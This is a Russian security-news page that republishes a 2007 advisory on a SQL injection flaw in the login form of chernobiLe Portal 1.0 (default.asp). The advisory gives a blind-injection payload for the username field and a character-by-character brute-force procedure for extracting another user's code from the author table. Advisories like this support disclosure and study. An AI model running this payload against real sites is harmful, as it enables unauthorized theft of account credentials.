Информационная безопасность

Уведомление о безопасности: chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] CVSTrac 2.0.0 Denial of Service (DoS) vulnerability

  MyPHPcommander 2.0 (package.
php) Remote File Include Vulnerability

  AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability

  Xt-Stats v.2.4.0.b3 (server_base_dir)
Remote File Include Vulnerability

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:29 января 2007 г.
Subject:chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

*******************************************************************************
# Title   :  chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Not Free,Private


# Info    :  /*
           Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
           Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
           aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
           *\

*******************************************************************************

[[SQL]]]

http://[target]/[path]//default.asp (POST Method) [SQL]

Example:

Method: One Char Brute Force Technique

First,Please Register Before:

User:
[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/
tblAuthor/**/WHERE/**/username='targetuser'),1,
1))='A'/*
Pass:[userpass]

If Login True Then First Character = A
elSe Continue...

[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-27]
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server